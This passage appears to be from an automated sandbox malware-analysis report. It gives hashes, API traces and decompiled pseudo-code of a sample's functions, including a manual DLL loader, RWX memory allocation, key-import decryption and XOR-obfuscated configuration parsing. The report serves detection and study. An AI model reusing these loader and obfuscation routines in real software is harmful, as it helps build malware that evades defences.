Opcode Fuzzy Hash: a368b50f6abff3f5ed879ab40fb7c0e9d15d3d2d8f4a14e37677d2a33c80813d
Instruction Fuzzy Hash: 6B015E35900529FBDF209F96EC88EAFBFB8EF84750F118066E910E6950D7748B44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 7033195C, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E7033195C(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E70331823( &_v8,  &_v12,  *0x703341cc ^ 0x13b675ce) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E70331CE6(_t22, _v8,  *0x703341cc ^ 0x64927f78);
					}
					if(_t29 != 0) {
						_v12 = E703311BF(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x70334190, 0, _v8);
				}
				return _t25;
			}

0x7033195c
0x7033195f
0x70331960
0x70331976
0x7033197f
0x70331984
0x7033199d
0x70331986
0x70331999
0x70331999
0x703319a1
0x703319ab
0x703319b3
0x703319bb
0x703319bd
0x703319bd
0x703319bb
0x703319cd
0x703319cd
0x703319d8

APIs

StrStrIA.KERNELBASE(00000000,70331576,?,70331576,?,00000000,00000001,?,?,?,70331576), ref: 703319B3
HeapFree.KERNEL32(00000000,?,?,70331576,?,00000000,00000001,?,?,?,70331576), ref: 703319CD

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e2b94d49dc0bb7f9381294c20540b6a55b8c80489ceb0e3aa96df3419855bec1
Instruction ID: bae94ace4f64bb9d27e8f6ef21b3afb65418538d44ab2404601af8cfa21910f5
Opcode Fuzzy Hash: e2b94d49dc0bb7f9381294c20540b6a55b8c80489ceb0e3aa96df3419855bec1
Instruction Fuzzy Hash: 1E014F77A10114BFDB019BA2CDC5BAFFBBDAB48601F614166B942E7250E730EE4197A0

Uniqueness

Uniqueness Score: -1.00%

Function 70344F75, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 7034186E: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 703418AF

_free.LIBCMT ref: 70344FE4

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5cd254f54bb3498de0713ab3f9d3f99138db8d49ef503c9f85816f7bcaea7c4f
Instruction ID: 1a2f883301d3fc7686862947667daa5ea995001fcaa19885fb15f87c74abc545
Opcode Fuzzy Hash: 5cd254f54bb3498de0713ab3f9d3f99138db8d49ef503c9f85816f7bcaea7c4f
Instruction Fuzzy Hash: BC0126726047166FD3218F58C8859ADFBE8EB053B0F520629F445BB6C0D7B0AD058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C25ED2, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00C25ED2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xc2a2d4; // 0x449d5a8
				_t4 = _t15 + 0xc2b394; // 0x50c893c
				_t20 = _t4;
				_t6 = _t15 + 0xc2b124; // 0x650047
				_t17 = E00C23969(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00C27206(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00c25edc
0x00c25ede
0x00c25ee5
0x00c25ee6
0x00c25ee7
0x00c25ee8
0x00c25eee
0x00c25ef3
0x00c25ef3
0x00c25efd
0x00c25f0f
0x00c25f16
0x00c25f45
0x00c25f18
0x00c25f1d
0x00c25f42
0x00c25f1f
0x00c25f22
0x00c25f29
0x00c25f34
0x00c25f2b
0x00c25f2e
0x00c25f2e
0x00c25f38
0x00c25f38
0x00c25f1d
0x00c25f4c

APIs

Part of subcall function 00C23969: SysFreeString.OLEAUT32(?), ref: 00C23A48

Part of subcall function 00C27206: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00C267B6,004F0053,00000000,?), ref: 00C2720F
Part of subcall function 00C27206: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00C267B6,004F0053,00000000,?), ref: 00C27239
Part of subcall function 00C27206: memset.NTDLL ref: 00C2724D

SysFreeString.OLEAUT32(00000000), ref: 00C25F38

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 0e284f5e18f8fbc246427c42492097040bee64ec01ac5810b1fc3545f17180dd
Instruction ID: dcfc6e04f7b883ff7f4bda848c7f7cbcf31f7eeb22b6997e079243806849c143
Opcode Fuzzy Hash: 0e284f5e18f8fbc246427c42492097040bee64ec01ac5810b1fc3545f17180dd
Instruction Fuzzy Hash: FC017131500539BFDB11AFE8ED05EAFBBB8FB08710F000455FA15E6421D3B09D519BA1

Uniqueness

Uniqueness Score: -1.00%

Function 7034186E, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 703418AF

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d7ac39f4da7d665116af8d66d730cf4d1375eb71fe032abe75cd71225e0f4899
Instruction ID: 1eed2796a8b10c6bd0958ee5a788227bb119f2850c560021e8757b820f90fe19
Opcode Fuzzy Hash: d7ac39f4da7d665116af8d66d730cf4d1375eb71fe032abe75cd71225e0f4899
Instruction Fuzzy Hash: B6F0B432504D245BEB125B268D05F7F37EDEB81670F326129BC16AE294CB70E94186E4

Uniqueness

Uniqueness Score: -1.00%

Function 00C213CC, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C213CC(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xc2a290, 0, _a4); // executed
				return _t2;
			}

0x00c213d8
0x00c213de

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00C220F3,00000000,00000000,?,00000000,?,?,?,?,?,00C268A9,00000000,?,00000001), ref: 00C213D8

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 71c3dd425c2cbe3664ef5d6f1c8abda6e506c26444cbcb9bb0bd68926efb607d
Instruction ID: 47f627a45034800918f1ed8b43c2985d16bedd748e86e78354e9b2db4edc1e05
Opcode Fuzzy Hash: 71c3dd425c2cbe3664ef5d6f1c8abda6e506c26444cbcb9bb0bd68926efb607d
Instruction Fuzzy Hash: FFB01271124104EBCB328B00DE04F0D7B32F754B00F104010B30D0087082320421FB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00C25FBC, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C25FBC(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xc2a290, 0, _a4); // executed
				return _t2;
			}

0x00c25fc8
0x00c25fce

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f64b515fb2b5ff4dce7936b8ef4e4ed9f74fbdfdf32f521dbef27999cdae6f45
Instruction ID: 8d0ae1057861efc20f9956283d483f6b52eea4758e08831b39f9e8fd2a54bf82
Opcode Fuzzy Hash: f64b515fb2b5ff4dce7936b8ef4e4ed9f74fbdfdf32f521dbef27999cdae6f45
Instruction Fuzzy Hash: 9BB01231434104EBCA228B00DD04F0D7B32F754B00F204010B2080087082320421EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 70331202, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E70331202(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x703341cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x703341cc - 0x69b24f45 &  !( *0x703341cc - 0x69b24f45);
				_t18 = E70331E91( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x703341cc - 0x69b24f45 &  !( *0x703341cc - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x703341cc - 0x69b24f45 &  !( *0x703341cc - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E703316E7(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E70331A0A(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E70332042(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E70331E7C(_t42);
					L8:
					return _t29;
				}
			}

0x7033120a
0x7033120c
0x70331228
0x70331239
0x70331240
0x7033129e
0x00000000
0x70331242
0x70331242
0x7033124c
0x70331250
0x70331255
0x70331258
0x7033125d
0x70331261
0x70331266
0x7033126b
0x7033126f
0x70331274
0x70331275
0x70331279
0x7033127e
0x70331286
0x70331286
0x7033127e
0x7033126f
0x70331261
0x70331288
0x70331291
0x70331295
0x7033129f
0x703312a5
0x703312a5

APIs

Part of subcall function 70331E91: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,7033123E,?,?,?,?,00000002,00000000,?,?), ref: 70331EB5
Part of subcall function 70331E91: GetProcAddress.KERNEL32(00000000,?), ref: 70331ED7
Part of subcall function 70331E91: GetProcAddress.KERNEL32(00000000,?), ref: 70331EED
Part of subcall function 70331E91: GetProcAddress.KERNEL32(00000000,?), ref: 70331F03
Part of subcall function 70331E91: GetProcAddress.KERNEL32(00000000,?), ref: 70331F19
Part of subcall function 70331E91: GetProcAddress.KERNEL32(00000000,?), ref: 70331F2F

Part of subcall function 703316E7: memcpy.NTDLL(00000000,00000002,7033124C,?,?,?,?,?,7033124C,?,?,?,?,?,?,00000002), ref: 70331714
Part of subcall function 703316E7: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 70331747

Part of subcall function 70331A0A: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 70331A42

Part of subcall function 70332042: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 7033207B
Part of subcall function 70332042: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 703320F0
Part of subcall function 70332042: GetLastError.KERNEL32 ref: 703320F6

GetLastError.KERNEL32(?,?), ref: 70331280

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 32dfe11e7d7ba12b5dea4b452455746d0380ee2a1439f4c39b22fc2418f1cd88
Instruction ID: a9a760325e8e82274e38fa4874c32976776e617da7c81d442767b77b04516d8a
Opcode Fuzzy Hash: 32dfe11e7d7ba12b5dea4b452455746d0380ee2a1439f4c39b22fc2418f1cd88
Instruction Fuzzy Hash: F611E636600601AFD3119BE98CC0D9FF7BDAF89215F414619EE02E7700EAA1FD068790

Uniqueness

Uniqueness Score: -1.00%

Function 7038F07D, Relevance: 1.3, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000991,00003000,00000040,00000991,7038EB00), ref: 7038F16D
VirtualAlloc.KERNEL32(00000000,000001D2,00003000,00000040,7038EB62), ref: 7038F1A4
VirtualAlloc.KERNEL32(00000000,0000FFCF,00003000,00000040), ref: 7038F204
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7038F23A

Memory Dump Source

Source File: 00000017.00000002.736035650.000000007038E000.00000040.00020000.sdmp, Offset: 7038E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7038e000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$Free
String ID:
API String ID: 3668210933-0
Opcode ID: cd9f000560f9d4c6fb5dc0d6b1d8933d531ae689c59e531e1eb7e7e4ff1f9e22
Instruction ID: 7f1b652f97d4a25e822743fc2fdb3431c038161f3f9045676a6018404c599f56
Opcode Fuzzy Hash: cd9f000560f9d4c6fb5dc0d6b1d8933d531ae689c59e531e1eb7e7e4ff1f9e22
Instruction Fuzzy Hash: 3811B132614500DFCB19CF24C895B953766EB51310F1906D9DC49AF2CBDA7C2809CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00C211B0, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C211B0(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E00C23B91(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0xc2a290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E00C25ED2(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00c211b0
0x00c211b8
0x00c211cf
0x00c211ea
0x00c211ee
0x00c211f3
0x00c211f5
0x00c21205
0x00c21211
0x00c211f7
0x00c211f7
0x00c211fa
0x00c211ff
0x00c211ff
0x00c211f5
0x00c21217
0x00c2121b
0x00c2121b
0x00c211c4
0x00c211c9
0x00c211cd
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00C25ED2: SysFreeString.OLEAUT32(00000000), ref: 00C25F38

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,00C25372,?,004F0053,050C9318,00000000,?), ref: 00C21211

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 0633a8f845f86418389949b47a668c7656df8f3ecd38f3f8162cb174915c79d2
Instruction ID: 51731af0b44188112efbcb73225d743e1ba39b27ee0d10f7a11f01489da38e10
Opcode Fuzzy Hash: 0633a8f845f86418389949b47a668c7656df8f3ecd38f3f8162cb174915c79d2
Instruction Fuzzy Hash: 00014B32000229FBCB229F48DC01FEE3B65FB54790F088018FE199A921C731CA20EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C26E5D, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00C26E5D(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E00C23276( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00C25FBC(_a8 + _a8);
					if(_t21 != 0) {
						E00C261A5(_a4, _t21, _t23);
					}
					E00C213CC(_a4);
				}
				return _t21;
			}

0x00c26e65
0x00c26e6c
0x00c26e6e
0x00c26e7d
0x00c26e84
0x00c26e93
0x00c26e97
0x00c26e9e
0x00c26e9e
0x00c26ea6
0x00c26eab
0x00c26eb0

APIs

lstrlen.KERNEL32(00000000,00000000,00C24A9F,00000000,?,00C271BA,00000000,00C24A9F,?,00000000,00C24A9F,00000000,050C9630), ref: 00C26E6E

Part of subcall function 00C23276: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00C26E82,00000001,00C24A9F,00000000), ref: 00C232AE
Part of subcall function 00C23276: memcpy.NTDLL(00C26E82,00C24A9F,00000010,?,?,?,00C26E82,00000001,00C24A9F,00000000,?,00C271BA,00000000,00C24A9F,?,00000000), ref: 00C232C7
Part of subcall function 00C23276: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00C232F0
Part of subcall function 00C23276: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00C23308
Part of subcall function 00C23276: memcpy.NTDLL(00000000,00000000,050C9630,00000010), ref: 00C2335A

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 7b392a0f781884c9d82d7e7ed8ba4539de7b54a8065b640cf38dcc00d6ed21e3
Instruction ID: 798fa0d282bd89aa94cd45c6e40c2d13deeb66b18163354da39f29657ebeb099
Opcode Fuzzy Hash: 7b392a0f781884c9d82d7e7ed8ba4539de7b54a8065b640cf38dcc00d6ed21e3
Instruction Fuzzy Hash: ADF03A36100119BADF116E95EC04DEF3BAEEF89360B018022BD18CA521DA31DA55ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C2304F, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C2304F(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E00C265FA(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E00C25F4F(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x00c23057
0x00c23071
0x00000000
0x00c2308d
0x00c23068
0x00c2306f
0x00000000
0x00000000
0x00c23094

APIs

lstrlenW.KERNEL32(?,?,?,00C25611,3D00C290,80000002,00C2755B,00C23E52,74666F53,4D4C4B48,00C23E52,?,3D00C290,80000002,00C2755B,?), ref: 00C23074

Part of subcall function 00C25F4F: SysAllocString.OLEAUT32(00C23E52), ref: 00C25F69
Part of subcall function 00C25F4F: SysFreeString.OLEAUT32(00000000), ref: 00C25FA9

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 1f2117f4ee3a79c86721c28be9cc0b5c7103251cc335f8b09fb0309146640339
Instruction ID: 43503306ad9b8ed7ee26a4dec16f0b9aca7763ab83260ba389a32029d3cd774f
Opcode Fuzzy Hash: 1f2117f4ee3a79c86721c28be9cc0b5c7103251cc335f8b09fb0309146640339
Instruction Fuzzy Hash: 95F0923201021EFFDF169F90ED46E9A3F6AEB08350F048024FA1854471D772CAB1EBA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C2725F, Relevance: 12.2, APIs: 8, Instructions: 225
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00C2725F(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				signed int _t59;
				void* _t61;
				void* _t62;
				signed int _t64;
				signed int _t67;
				signed int _t71;
				signed int _t75;
				signed int _t79;
				signed int _t83;
				signed int _t87;
				void* _t92;
				intOrPtr _t109;

				_t93 = __ecx;
				_t28 =  *0xc2a2d0; // 0x69b25f44
				if(E00C26BB2( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0xc2a324 = _v8;
				}
				_t33 =  *0xc2a2d0; // 0x69b25f44
				if(E00C26BB2( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L57:
					return _v12;
				}
				_t39 =  *0xc2a2d0; // 0x69b25f44
				if(E00C26BB2( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L55:
					HeapFree( *0xc2a290, 0, _v16);
					goto L57;
				} else {
					_t92 = _v12;
					if(_t92 == 0) {
						_t45 = 0;
					} else {
						_t87 =  *0xc2a2d0; // 0x69b25f44
						_t45 = E00C22C90(_t93, _t92, _t87 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0xc2a298 = _v8;
						}
					}
					if(_t92 == 0) {
						_t46 = 0;
					} else {
						_t83 =  *0xc2a2d0; // 0x69b25f44
						_t46 = E00C22C90(_t93, _t92, _t83 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0xc2a29c = _v8;
						}
					}
					if(_t92 == 0) {
						_t47 = 0;
					} else {
						_t79 =  *0xc2a2d0; // 0x69b25f44
						_t47 = E00C22C90(_t93, _t92, _t79 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0xc2a2a0 = _v8;
						}
					}
					if(_t92 == 0) {
						_t48 = 0;
					} else {
						_t75 =  *0xc2a2d0; // 0x69b25f44
						_t48 = E00C22C90(_t93, _t92, _t75 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0xc2a004 = _v8;
						}
					}
					if(_t92 == 0) {
						_t49 = 0;
					} else {
						_t71 =  *0xc2a2d0; // 0x69b25f44
						_t49 = E00C22C90(_t93, _t92, _t71 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0xc2a02c = _v8;
						}
					}
					if(_t92 == 0) {
						_t50 = 0;
					} else {
						_t67 =  *0xc2a2d0; // 0x69b25f44
						_t50 = E00C22C90(_t93, _t92, _t67 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0xc2a2a4 = 5;
						goto L42;
					} else {
						_t93 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t92 == 0) {
								_t51 = 0;
							} else {
								_t64 =  *0xc2a2d0; // 0x69b25f44
								_t51 = E00C22C90(_t93, _t92, _t64 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t61 = 0x10;
								_t62 = E00C25BBA(_t61);
								if(_t62 != 0) {
									_push(_t62);
									E00C2152E();
								}
							}
							if(_t92 == 0) {
								_t52 = 0;
							} else {
								_t59 =  *0xc2a2d0; // 0x69b25f44
								_t52 = E00C22C90(_t93, _t92, _t59 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E00C25BBA(0, _t52) != 0) {
								_t109 =  *0xc2a37c; // 0x50c9630
								E00C24013(_t109 + 4, _t57);
							}
							_t53 =  *0xc2a2d4; // 0x449d5a8
							_t22 = _t53 + 0xc2b2d2; // 0x50c887a
							_t23 = _t53 + 0xc2b7c4; // 0x6976612e
							 *0xc2a320 = _t22;
							 *0xc2a390 = _t23;
							HeapFree( *0xc2a290, 0, _t92);
							_v12 = 0;
							goto L55;
						}
					}
				}
			}

0x00c2725f
0x00c27262
0x00c27282
0x00c27290
0x00c27290
0x00c27295
0x00c272af
0x00c274bc
0x00c274c3
0x00c274ca
0x00c274ca
0x00c272b5
0x00c272d1
0x00c274aa
0x00c274b4
0x00000000
0x00c272d7
0x00c272d7
0x00c272dc
0x00c272f2
0x00c272de
0x00c272de
0x00c272eb
0x00c272eb
0x00c272fc
0x00c272fe
0x00c27308
0x00c2730d
0x00c2730d
0x00c27308
0x00c27314
0x00c2732a
0x00c27316
0x00c27316
0x00c27323
0x00c27323
0x00c2732e
0x00c27330
0x00c2733a
0x00c2733f
0x00c2733f
0x00c2733a
0x00c27346
0x00c2735c
0x00c27348
